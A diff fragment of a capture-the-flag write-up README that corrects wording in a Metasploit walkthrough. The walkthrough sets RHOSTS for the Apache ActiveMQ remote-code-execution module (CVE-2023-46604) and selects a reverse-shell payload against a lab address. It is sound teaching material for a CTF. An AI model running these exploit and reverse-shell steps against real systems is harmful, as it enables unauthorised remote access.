spydx/equinor-ctf-2024/writeups/realworld/Prime Time (user)/Equisør/README.md

 ```

-use `set` to set RHOSTS.
-RHOSTS is one or multiple remote hosts to exploit.
+Use `set` to set RHOSTS.
+RHOSTS in metasploit is one or multiple remote hosts you want to exploit.
 ```
 msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set RHOSTS 10.128.2.185
 ```
 Set the payload to `cmd/unix/reverse`.
 The payload defines what to do when we have executed the exploit successfully.
-This could be reading files, creationg users or opening a reverse shell.
+This could be reading files, creating users or opening a reverse shell.
 We want that reverse shell.
 To see all available payloads for the exploit you can run `show payloads`.

 ```
 msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set payload cmd/unix/reverse